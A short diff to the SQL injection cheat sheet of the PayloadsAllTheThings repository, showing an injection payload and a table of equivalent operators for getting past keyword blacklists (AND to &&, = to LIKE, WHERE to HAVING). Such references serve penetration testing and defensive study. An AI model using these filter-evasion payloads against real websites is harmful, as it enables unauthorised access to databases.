swisskyrepo/PayloadsAllTheThings/SQL injection/README.md

 ?id=1 aNd 1=1#
 ```

-Blacklist using keywords case insensitive - bypass using equivalent
+Blacklist using keywords case insensitive - bypass using an equivalent operator
 ```
 AND   -> &&
 OR    -> ||
 =     -> LIKE,REGEXP, not < and not >
+> X   -> not between 0 and X
 WHERE -> HAVING
 ```